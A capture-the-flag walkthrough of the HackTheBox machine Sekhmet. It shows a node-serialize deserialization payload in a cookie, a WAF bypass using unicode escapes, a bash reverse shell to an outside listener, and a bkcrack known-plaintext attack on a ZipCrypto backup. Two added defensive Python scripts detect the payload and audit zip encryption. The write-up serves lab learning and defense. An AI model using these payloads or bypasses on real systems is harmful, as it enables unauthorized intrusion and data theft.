---
title: HTB Walkthrough Sekhmet
layout: true
categories: HackTheBox
tags:
- Active Directory
cover: https://raw.githubusercontent.com/Crazyinside/blog.image/main/material/wallhaven-d5xolg_1920x1080.png
---
Port Info
$ sudo nmap -p- -sC -sV 10.10.11.179 -oN PortOpen
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-18 10:39 CST
Nmap scan report for 10.10.11.179
Host is up (0.11s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 8c7155df97275ed5375a8de2923bf36e (RSA)
| 256 b232f5889bfb58fa35b0710c9abd3cef (ECDSA)
|_ 256 eb73c0936e40c8f6b0a828937d18474c (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: 403 Forbidden
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 258.45 seconds
Get Shell
Some usernames can be collected from the home page:
Directory brute-forcing turns up a few files:
$ dirsearch -u http://www.windcorp.htb/ -x 403
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 30 | Wordlist size: 10927
Output File: /home/crazyinside/.dirsearch/reports/www.windcorp.htb/-_23-04-18_10-55-13.txt
Error Log: /home/crazyinside/.dirsearch/logs/errors-23-04-18_10-55-13.log
Target: http://www.windcorp.htb/
[10:55:14] Starting:
[10:55:25] 200 - 213B - /Readme.txt
[10:55:38] 301 - 169B - /assets -> http://www.windcorp.htb/assets/
[10:55:41] 200 - 2KB - /changelog.txt
[10:55:50] 200 - 34KB - /index.html
$ curl http://www.windcorp.htb/Readme.txt
Thanks for downloading this template!
Template Name: MyBiz
Template URL: https://bootstrapmade.com/mybiz-free-business-bootstrap-theme/
Author: BootstrapMade.com
License: https://bootstrapmade.com/license/
Thanks for downloading the template. The other file holds the template's version history:
$ curl http://www.windcorp.htb/changelog.txt
Version: 4.7.0
- Updated Bootstrap to version 5.1.3
- Updated all outdated third party vendor libraries to their latest versions
Version: 4.6.0
- Updated Bootstrap to version 5.1.2
- Updated all outdated third party vendor libraries to their latest versions
Version: 4.5.0
- Fixed slider issue in testimonials and portfolio details sections
Version: 4.4.0
- Updated Bootstrap to version 5.1.1
- Updated all outdated third party vendor libraries to their latest versions
- Improved and updated dev version gulp scripts
Version: 4.3.0
- Updated Bootstrap to version 5.0.1
- Updated all outdated third party vendor libraries to their latest versions
- Fixed navigation links focus color
Version: 4.2.0
- Updated Bootstrap to version 5.0.0 Final
- Updated all outdated third party vendor libraries to their latest versions
Version: 4.1.0
- Updated Bootstrap to version 5.0.0-beta3
- Updated all outdated third party vendor libraries to their latest versions
- Updated the PHP Email Form to V3.1
Version: 4.0.1
- Updated Bootstrap to version 5.0.0-beta2
- Updated all outdated third party vendor libraries to their latest versions
Version: 4.0.0
- The template does not require jQuery anymore
- Removed jQuery and all the jQuery plugins
- The assets/js/main.js was rewritten completely with vanilla Javascript. No more jQuery code
- Restructured the dev version for better development experience
- Updated the PHP Email Form to V3.0 - No jQuery dependency. Added attachment support
Version: 3.0.0
- Initial release with Bootstrap v5.0 Beta 1
Version: 2.2.0
- Updated Bootstrap to version 4.5.3
- Updated all outdated third party vendor libraries to their latest versions
- Updated the PHP Email Form to v2.3
- Other small fixes and improvements
Version: 2.1.0
- Updated Bootstrap to version 4.5.0
- Updated the PHP Email Form library to version 2.0 with reCaptcha support
- Aded inner-page.html tempalte
- Added smooth scroll on page load with hash links in the url
- Updated all outdated third party vendor libraries to their latest versions
- Other small fixes and improvements
Version: 2.0.0
- The template was rebuilt from scratch with the latest Bootstrap version (4.4.1)
- Added SMPTP support for the contact form script (Pro)
- Added NodeJS NPM Development version (Pro unlimited & Membership members)
Version: 1.0.0
- Initial Release
Try enumerating virtual hosts:
$ wfuzz -c -u http://windcorp.htb -H "Host:FUZZ.windcorp.htb" -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt --hh 153
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://windcorp.htb/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000048: 403 43 L 162 W 2436 Ch "portal"
The scan reports 403, but the vhost can be browsed:
admin:admin logs in, but the page behind it is static:
Directory enumeration on it returns nothing but 404s:
For now, the only foothold to work on is the login endpoint.
POST /login HTTP/1.1
Host: portal.windcorp.htb
Content-Length: 29
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://portal.windcorp.htb
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://portal.windcorp.htb/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: app=s%3AQ4mCWykqKPCQ5RqqdEVnr28wxccUAEzH.oKfK7yn6guomWw5X%2BxBP8rAqPblw30IAQlwI5X8z5lg
Connection: close
username=admin&password=admin
On a successful login the server responds with a 302 redirect and sets a cookie:
HTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Tue, 18 Apr 2023 03:18:27 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 46
Connection: close
X-Powered-By: Express
Set-Cookie: profile=eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2ODE3ODc5MDczMjh9; Max-Age=604800; HttpOnly
Location: /
Vary: Accept
<p>Found. Redirecting to <a href="/">/</a></p>
The cookie is only base64-encoded:
$ echo "eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2ODE3ODc5MDczMjh9"|base64 -d
{"username":"admin","admin":"1","logon":1681787907328}
Maybe I should try deserialization injection. First I try to identify the target's server-side language:
$ curl -I http://portal.windcorp.htb/
HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 18 Apr 2023 03:20:47 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 1066
Connection: keep-alive
X-Powered-By: Express
ETag: W/"42a-ceoj/qzu7pE8a4/5MOc2Roj9g0U"
Set-Cookie: app=s%3AJp-GMeydxxsvPq7AS8b_4q8yF8iOPEqn.3GtKCu2b2i8uxC4F70hRaTszdQPP1U95diqVY9M9Pkk; Path=/; HttpOnly
A web search tells me the target is probably running Node.js.
I found the following payload on HackTricks:
{"rce":"_$$ND_FUNC$$_function (){\n\t require('child_process').exec('ls /', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
Encoding it and submitting it triggers the WAF:
A WAF that does not blacklist the source IP can be probed quite crudely: I removed the payload piece by piece, and once only this much was left the WAF stopped blocking:
In the end, this is blocked by the WAF:
$ echo "eyJyY2UiOiJfJCRORF9GVU5DJCRf"|base64 -d
{"rce":"_$$ND_FUNC$$_
while this is not:
$ echo "eyJyY2UiOiJfJCRORF9GVU5DJCR"|base64 -d
{"rce":"_$$ND_FUNC$$
Further trials showed that it is the function definition that triggers the block:
So I can try a blacklist bypass. The response headers already say the target uses charset=utf-8, but even after encoding $ the WAF still seemed to block:
{"rce":"_$$ND_FUNC\u0024$_function ()\u007b require('child_process').exec('ping -c 1 10.10.16.3', function(error, stdout, stderr) { console.log(stdout) });\n }()"}
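The bypass above works because the WAF matches the raw cookie bytes, while node-serialize only sees the value after JSON parsing has turned \u0024 back into $. The following Python script, added here as an illustration and not part of the original walkthrough, decodes a profile cookie the way the application would and checks for the serialised-function marker only after that normalisation, then contrasts it with a naive raw-bytes match; it also shows the fix the application should have used, an HMAC-signed cookie that is parsed as plain JSON and never deserialised into functions. The probe cookies and the key are constructed; the first sample cookie is the legitimate one shown above.

```python
import base64
import hashlib
import hmac
import json

# Marker node-serialize puts in front of a serialised function body; a cookie
# that still carries it after decoding is a deserialisation-to-RCE attempt.
ND_FUNC_MARKER = "_$$ND_FUNC$$_"


def _b64decode(value: str) -> bytes:
    # Express-style cookies often drop base64 padding; restore it before decoding.
    return base64.b64decode(value + "=" * (-len(value) % 4))


def naive_waf_blocks(cookie_value: str) -> bool:
    """What a signature on the raw decoded bytes sees: the marker as a literal string."""
    return ND_FUNC_MARKER in _b64decode(cookie_value).decode("utf-8", "replace")


def decode_profile_cookie(cookie_value: str):
    """Decode the cookie the way the application does: base64, then JSON.
    json.loads resolves \\u0024-style escapes, so the marker check below sees
    the same characters node-serialize would see."""
    return json.loads(_b64decode(cookie_value))


def find_serialized_functions(obj, path="$"):
    """Walk the decoded object; return paths of string values carrying the marker."""
    hits = []
    if isinstance(obj, dict):
        for key, value in obj.items():
            hits += find_serialized_functions(value, f"{path}.{key}")
    elif isinstance(obj, list):
        for i, value in enumerate(obj):
            hits += find_serialized_functions(value, f"{path}[{i}]")
    elif isinstance(obj, str) and ND_FUNC_MARKER in obj:
        hits.append(path)
    return hits


def sign_profile(profile: dict, key: bytes) -> str:
    """The fix: plain JSON, base64, and an HMAC tag; node-serialize is not involved."""
    body = base64.b64encode(json.dumps(profile, separators=(",", ":")).encode()).decode()
    tag = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    return f"{body}.{tag}"


def verify_profile(cookie: str, key: bytes):
    """Return the profile dict if the tag matches, else None. JSON only: there is
    no code path that can turn a string value into a function."""
    body, sep, tag = cookie.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(key, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, expected):
        return None
    return json.loads(base64.b64decode(body))


# The legitimate cookie from the walkthrough's login response.
PAGE_COOKIE = "eyJ1c2VybmFtZSI6ImFkbWluIiwiYWRtaW4iOiIxIiwibG9nb24iOjE2ODE3ODc5MDczMjh9"
# Constructed, harmless probes: the marker written literally, and with $ as \u0024.
PLAIN_PROBE = base64.b64encode(b'{"rce":"_$$ND_FUNC$$_function (){ return 1 }()"}').decode()
ESCAPED_PROBE = base64.b64encode(rb'{"rce":"_$$ND_FUNC\u0024$_function (){ return 1 }()"}').decode()
DEMO_KEY = b"constructed-demo-key"  # a real deployment loads this from secret storage

if __name__ == "__main__":
    for name, cookie in [("page", PAGE_COOKIE), ("plain", PLAIN_PROBE), ("escaped", ESCAPED_PROBE)]:
        hits = find_serialized_functions(decode_profile_cookie(cookie))
        print(f"{name:8} raw-match blocks={naive_waf_blocks(cookie)!s:5} after-json hits={hits}")
    signed = sign_profile({"username": "admin", "admin": "0"}, DEMO_KEY)
    print("signed cookie verifies:", verify_profile(signed, DEMO_KEY) is not None)
```

The escaped probe slips past the raw-bytes match but is caught once the cookie is decoded the way the application decodes it; the general rule is to run any signature check on the same representation the consumer will act on. The signed-cookie variant removes the problem class entirely, since a forged or tampered body fails the HMAC check before anything is parsed.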
After fiddling for ages with no response, I realised I was sending to the wrong place: the request should go to Home, not About:
GET / HTTP/1.1
Host: portal.windcorp.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://portal.windcorp.htb/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: app=s%3A3zLkS45GlQu11iwPG5UqOGzTJVH0V7XS.cLmH%2B5RiAhyxb6r495zJ2ZQbE5G3Cb15zeM%2B0LomvtU; profile=eyJyY2UiOiJfJCRORF9GVU5DXHUwMDI0JF9mdW5jdGlvbiAoKVx1MDA3YiByZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygncGluZyAtYyAxIDEwLjEwLjE2LjMnLCBmdW5jdGlvbihlcnJvciwgc3Rkb3V0LCBzdGRlcnIpIHsgY29uc29sZS5sb2coc3Rkb3V0KSB9KTtcbiB9KCkifQ==
If-None-Match: W/"56c-p/i7GTqmqUq+k/bjnk4SFBcSAkI"
Connection: close
The ping arrives:
$ sudo tcpdump -i tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
12:49:54.744450 IP windcorp.htb > 10.10.16.3: ICMP echo request, id 1000, seq 1, length 64
12:49:54.744472 IP 10.10.16.3 > windcorp.htb: ICMP echo reply, id 1000, seq 1, length 64
Rewrite the payload to get a reverse shell:
{"rce":"_$$ND_FUNC\u0024$_function ()\u007brequire('child_process').exec('bash -c \"bash -i >& /dev/tcp/10.10.16.3/1337 0>&1\" ',function(error, stdout, stderr) { console.log(stdout) });\n }()"}
GET / HTTP/1.1
Host: portal.windcorp.htb
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://portal.windcorp.htb/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: app=s%3A3zLkS45GlQu11iwPG5UqOGzTJVH0V7XS.cLmH%2B5RiAhyxb6r495zJ2ZQbE5G3Cb15zeM%2B0LomvtU; profile=eyJyY2UiOiJfJCRORF9GVU5DXHUwMDI0JF9mdW5jdGlvbiAoKVx1MDA3YnJlcXVpcmUoJ2NoaWxkX3Byb2Nlc3MnKS5leGVjKCdiYXNoIC1jIFwiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi4zLzEzMzcgMD4mMVwiICcsZnVuY3Rpb24oZXJyb3IsIHN0ZG91dCwgc3RkZXJyKSB7IGNvbnNvbGUubG9nKHN0ZG91dCkgfSk7XG4gfSgpIn0=
If-None-Match: W/"56c-p/i7GTqmqUq+k/bjnk4SFBcSAkI"
Connection: close
Shell obtained:
$ nc -lvnp 1337
listening on [any] 1337 ...
connect to [10.10.16.3] from (UNKNOWN) [10.10.11.179] 58394
bash: cannot set terminal process group (474): Inappropriate ioctl for device
bash: no job control in this shell
webster@webserver:/$ whoami
whoami
webster
webster@webserver:/$ ls
Get Ray.duncan
There is a backup.zip in the user's home directory:
webster@webserver:~$ ls
backup.zip
I found the web root and copied the backup file into it:
webster@webserver:/var/www/windcorp$ ls
assets changelog.txt index.html portfolio-details.html Readme.txt
webster@webserver:/var/www/windcorp$ cp ~/backup.zip .
webster@webserver:/var/www/windcorp$ ls
assets changelog.txt portfolio-details.html
backup.zip index.html Readme.txt
The archive is password-protected; try cracking it:
$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:00 DONE (2023-04-18 13:09) 0g/s 20490Kp/s 20490Kc/s 20490KC/s (7MNegN77)..*7¡Vamos!
Session completed.
No result. 7z l -slt shows that the archive's encryption method is ZipCrypto Deflate:
$ 7z l -slt backup.zip
7-Zip [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=zh_CN.UTF-8,Utf16=on,HugeFiles=on,64 bits,16 CPUs AMD Ryzen 7 6800H with Radeon Graphics (A40F41),ASM,AES-NI)
Scanning the drive for archives:
1 file, 72984 bytes (72 KiB)
Listing archive: backup.zip
--
Path = backup.zip
Type = zip
Physical Size = 72984
----------
Path = etc/passwd
Folder = -
Size = 1509
Packed Size = 554
Modified = 2022-04-30 23:27:46
Created =
Accessed =
Attributes = _ -rw-r--r--
Encrypted = +
Comment =
CRC = D00EEE74
Method = ZipCrypto Deflate
Host OS = Unix
Version = 20
Volume Index = 0
Use bkcrack to list the archive entries:
$ ./bkcrack -L ~/Documents/HackTheBox/Sekhmet/backup.zip
bkcrack 1.5.0 - 2022-07-07
Archive: /home/crazyinside/Documents/HackTheBox/Sekhmet/backup.zip
Index Encryption Compression CRC32 Uncompressed Packed size Name
----- ---------- ----------- -------- ------------ ------------ ----------------
0 ZipCrypto Deflate d00eee74 1509 554 etc/passwd
1 None Store 00000000 0 0 etc/sssd/conf.d/
2 ZipCrypto Deflate a46408d2 411 278 etc/sssd/sssd.conf
3 None Store 00000000 0 0 var/lib/sss/db/
4 ZipCrypto Deflate 7c8f25f5 1286144 3122 var/lib/sss/db/timestamps_windcorp.htb.ldb
5 ZipCrypto Deflate 1586648d 1286144 2492 var/lib/sss/db/config.ldb
6 None Store 00000000 0 0 var/lib/sss/db/test/
7 ZipCrypto Deflate 2dda0c65 1286144 2421 var/lib/sss/db/test/timestamps_windcorp.htb.ldb
8 ZipCrypto Deflate 861052a8 1286144 2536 var/lib/sss/db/test/config.ldb
9 ZipCrypto Deflate cdf7b29c 1286144 5044 var/lib/sss/db/test/cache_windcorp.htb.ldb
10 ZipCrypto Deflate 2d029dc7 1286144 1505 var/lib/sss/db/test/sssd.ldb
11 ZipCrypto Deflate [CRC garbled] 4016 3651 var/lib/sss/db/test/ccache_WINDCORP.HTB
12 ZipCrypto Deflate 8ff31622 1609728 10145 var/lib/sss/db/cache_windcorp.htb.ldb
13 ZipCrypto Deflate 2d029dc7 1286144 1505 var/lib/sss/db/sssd.ldb
14 ZipCrypto Deflate c6656211 2708 2519 var/lib/sss/db/ccache_WINDCORP.HTB
15 None Store 00000000 0 0 var/lib/sss/deskprofile/
16 None Store 00000000 0 0 var/lib/sss/gpo_cache/
17 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/
18 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/
19 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
20 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/
21 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/
22 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/
23 None Store 00000000 0 0 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/
24 ZipCrypto Deflate 5b393fde 2568 700 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
25 ZipCrypto Store 74a7bec9 23 35 var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
26 None Store 00000000 0 0 var/lib/sss/keytabs/
27 None Store 00000000 0 0 var/lib/sss/mc/
28 ZipCrypto Deflate 10c2d4bf 9253600 9186 var/lib/sss/mc/passwd
29 ZipCrypto Deflate a0dedff3 6940392 6814 var/lib/sss/mc/group
30 ZipCrypto Deflate 09850b8d 11567160 11389 var/lib/sss/mc/initgroups
31 None Store 00000000 0 0 var/lib/sss/pipes/
32 None Store 00000000 0 0 var/lib/sss/pipes/private/
33 None Store 00000000 0 0 var/lib/sss/pubconf/
34 ZipCrypto Store 5a1a3ba3 12 24 var/lib/sss/pubconf/kdcinfo.WINDCORP.HTB
35 None Store 00000000 0 0 var/lib/sss/pubconf/krb5.include.d/
36 ZipCrypto Store 8c44e15f 40 52 var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
37 ZipCrypto Deflate cc306b59 113 105 var/lib/sss/pubconf/krb5.include.d/localauth_plugin
38 ZipCrypto Store 701d2553 15 27 var/lib/sss/pubconf/krb5.include.d/domain_realm_windcorp_htb
39 None Store 00000000 0 0 var/lib/sss/secrets/
Among them is etc/passwd. The ZipCrypto known-plaintext attack needs an unencrypted copy of one of the files, so, following the tool's documentation, I copied the target's unencrypted /etc/passwd to my machine:
webster@webserver:/$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:110:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
webster:x:1000:1000:webster,,,:/home/webster:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
sssd:x:106:112:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
ntp:x:107:113::/nonexistent:/usr/sbin/nologin
webster@webserver:/$
Recover the internal keys from the archive:
$ ~/Public/bkcrack-1.5.0-Linux/bkcrack -C backup.zip -c etc/passwd -P plain.zip -p passwd
bkcrack 1.5.0 - 2022-07-07
[14:03:45] Z reduction using 535 bytes of known plaintext
100.0 % (535 / 535)
[14:03:46] Attack on 14541 Z values at index 9
Keys: d6829d8d 8514ff97 afc3f825
91.7 % (13330 / 14541)
[14:03:51] Keys
d6829d8d 8514ff97 afc3f825
Use the keys to write the original archive's contents into a new archive protected with the password password:
$ ~/Public/bkcrack-1.5.0-Linux/bkcrack -C backup.zip -k d6829d8d 8514ff97 afc3f825 -U backuppassword.zip password
bkcrack 1.5.0 - 2022-07-07
[14:08:31] Writing unlocked archive backuppassword.zip with password "password"
100.0 % (21 / 21)
Wrote unlocked archive.
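ZipCrypto is breakable with about a dozen bytes of known plaintext, and a backup that bundles /etc/passwd hands those bytes to whoever holds the archive. The following Python script, an added example rather than anything from the walkthrough or from bkcrack, hand-builds a small archive with the same header layout and audits it: it reads each entry's general-purpose flag and compression method through zipfile and reports entries that are unencrypted, AES-encrypted (WinZip method 99), ZipCrypto-encrypted, or ZipCrypto-encrypted with predictable content. The entry list and the set of predictable file names are constructed for the example.

```python
import io
import struct
import zipfile
import zlib

WINZIP_AES = 99          # compression method id WinZip uses to mark AES-encrypted entries
FLAG_ENCRYPTED = 0x0001  # general-purpose bit 0: entry is encrypted

# Files whose first bytes an attacker can predict; a ZipCrypto entry with such
# content is exactly what a known-plaintext tool needs. Constructed list.
PREDICTABLE_NAMES = {"etc/passwd", "etc/group", "etc/hostname", "etc/os-release"}


def _entry(name, data, offset, encrypted=False, aes=False):
    """Return (local header + data, central directory record) for one STORED
    entry. Only the header flags are set; the bytes are not really encrypted,
    which is all a header audit needs. Constructed for this example."""
    name_b = name.encode()
    flags = FLAG_ENCRYPTED if encrypted else 0
    method = WINZIP_AES if aes else 0   # ZipCrypto keeps the real method (0 = STORED)
    crc = zlib.crc32(data) & 0xFFFFFFFF
    n = len(data)
    local = struct.pack("<IHHHHHIIIHH", 0x04034B50, 20, flags, method, 0, 0x21,
                        crc, n, n, len(name_b), 0) + name_b + data
    central = struct.pack("<IHHHHHHIIIHHHHHII", 0x02014B50, 20, 20, flags, method,
                          0, 0x21, crc, n, n, len(name_b), 0, 0, 0, 0, 0, offset) + name_b
    return local, central


def build_sample_archive() -> bytes:
    """Hand-built archive mimicking the backup's layout (constructed sample)."""
    spec = [
        ("etc/passwd", b"root:x:0:0:root:/root:/bin/bash\n", True, False),
        ("etc/sssd/sssd.conf", b"[sssd]\ndomains = windcorp.htb\n", True, False),
        ("var/lib/sss/secrets/secrets.ldb", b"ldb-dummy", True, True),
        ("Readme.txt", b"not encrypted", False, False),
    ]
    body, cd = b"", b""
    for name, data, enc, aes in spec:
        local, central = _entry(name, data, len(body), enc, aes)
        body += local
        cd += central
    eocd = struct.pack("<IHHHHIIH", 0x06054B50, 0, 0, len(spec), len(spec),
                       len(cd), len(body), 0)
    return body + cd + eocd


def audit_zip(blob: bytes) -> dict:
    """Classify every file entry: plaintext, aes, zipcrypto, or
    zipcrypto-known-plaintext-risk."""
    verdicts = {}
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            if not info.flag_bits & FLAG_ENCRYPTED:
                verdict = "plaintext"
            elif info.compress_type == WINZIP_AES:
                verdict = "aes"
            elif info.filename in PREDICTABLE_NAMES:
                verdict = "zipcrypto-known-plaintext-risk"
            else:
                verdict = "zipcrypto"
            verdicts[info.filename] = verdict
    return verdicts


if __name__ == "__main__":
    for name, verdict in audit_zip(build_sample_archive()).items():
        print(f"{verdict:32} {name}")
```

Point audit_zip at a real archive by reading the file into bytes; any zipcrypto verdict means the password is irrelevant once one entry's plaintext is known, and the fix is AES (method 99) or encrypting the whole backup with a separate tool rather than relying on the zip format's legacy cipher.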
Then extract it:
$ unzip backuppassword.zip
Archive: backuppassword.zip
[backuppassword.zip] etc/passwd password:
inflating: etc/passwd
creating: etc/sssd/conf.d/
inflating: etc/sssd/sssd.conf
creating: var/lib/sss/db/
inflating: var/lib/sss/db/timestamps_windcorp.htb.ldb
inflating: var/lib/sss/db/config.ldb
creating: var/lib/sss/db/test/
inflating: var/lib/sss/db/test/timestamps_windcorp.htb.ldb
inflating: var/lib/sss/db/test/config.ldb
inflating: var/lib/sss/db/test/cache_windcorp.htb.ldb
inflating: var/lib/sss/db/test/sssd.ldb
inflating: var/lib/sss/db/test/ccache_WINDCORP.HTB
inflating: var/lib/sss/db/cache_windcorp.htb.ldb
inflating: var/lib/sss/db/sssd.ldb
inflating: var/lib/sss/db/ccache_WINDCORP.HTB
creating: var/lib/sss/deskprofile/
creating: var/lib/sss/gpo_cache/
creating: var/lib/sss/gpo_cache/windcorp.htb/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/
creating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/
inflating: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/Machine/Microsoft/Windows NT/SecEdit/GptTmpl.inf
extracting: var/lib/sss/gpo_cache/windcorp.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/GPT.INI
creating: var/lib/sss/keytabs/
creating: var/lib/sss/mc/
inflating: var/lib/sss/mc/passwd
inflating: var/lib/sss/mc/group
inflating: var/lib/sss/mc/initgroups
creating: var/lib/sss/pipes/
creating: var/lib/sss/pipes/private/
creating: var/lib/sss/pubconf/
extracting: var/lib/sss/pubconf/kdcinfo.WINDCORP.HTB
creating: var/lib/sss/pubconf/krb5.include.d/
extracting: var/lib/sss/pubconf/krb5.include.d/krb5_libdefaults
inflating: var/lib/sss/pubconf/krb5.include.d/localauth_plugin
extracting: var/lib/sss/pubconf/krb5.include.d/domain_realm_windcorp_htb
creating: var/lib/sss/secrets/
Why not just read these directories on the target with the shell?
webster@webserver:/$ cat /etc/ss
ssh/ ssl/ sssd/
webster@webserver:/$ cd /etc/sssd
webster@webserver:/etc/sssd$ ls
ls: cannot open directory '.': Permission denied
webster@webserver:/etc/sssd$
No permission, so never mind. Judging by the files, this looks like a domain-joined host:
$ cat sssd.conf
[sssd]
domains = windcorp.htb
config_file_version = 2
services = nss, pam
[domain/windcorp.htb]
default_shell = /bin/bash
krb5_store_password_if_offline = True
cache_credentials = True
krb5_realm = WINDCORP.HTB
realmd_tags = manages-system joined-with-adcli
id_provider = ad
fallback_homedir = /home/%u@%d
ad_domain = windcorp.htb
use_fully_qualified_names = True
ldap_id_mapping = True
access_provider = ad
The domain controller's IP is:
